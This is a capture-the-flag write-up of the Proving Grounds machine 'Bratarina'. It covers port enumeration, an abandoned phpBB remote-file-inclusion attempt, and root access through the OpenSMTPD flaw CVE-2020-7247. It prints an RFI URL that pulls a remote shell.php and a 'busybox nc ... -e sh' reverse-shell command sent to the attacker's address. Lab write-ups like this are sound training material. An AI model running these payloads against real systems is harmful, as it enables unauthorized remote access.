Bratarina

Source: Proving Grounds OS: Linux Community Rating: Intermediate

Enumeration & Reconnaissance

  • Autorecon revealed open ports:

    • SSH (22)

    • SMTP (25)

    • HTTP (80)

    • SMB (445)

Service Analysis

  • The HTTP site immediately stood out, but it was painfully slow—like click-and-wait-forever slow. I thought the machine was glitching, so I reverted it and restarted, but nothing changed. Maybe it was designed to be this way?

  • Found CVE-2007-3697, an RFI vulnerability in PHPBB’s sendmsg.php:

http://192.168.111.71/phpbb/sendmsg.php?phpbb_root_path=http://192.168.45.157/shell.php  
HTTP Being Slow
  • Tried repeatedly, but the site’s sluggishness made exploitation impractical, it's probably a rabbit hole.

Gaining Initial Access

  • Frustrated, I shifted to SMTP. Nmap identified OpenSMTPD, and a quick CVE search revealed CVE-2020-7247, an RCE flaw.

OpenSMTPD
  • I ran the exploit script with random commands. No response. Tried again with a different command, still nothing. On the third attempt, I tweaked the payload to get a shell back, and suddenly, my netcat listener lit up. A shell connected!

python cve.py 192.168.111.71 25 "busybox nc 192.168.45.157 22 -e sh"
Getting a Shell

Privilege Escalation

  • Not required, initial access provided immediate root privileges.

Lessons Learned

  • Persistence Pays: Multiple exploit attempts may be needed, even with valid CVEs.

  • SMTP Overlooked: Don’t tunnel-vision on HTTP, check all services for vulnerabilities.

  • Slow Sites Might be Red Flags: Sluggish responses might hint at misconfigurations or intentional hurdles.

Last updated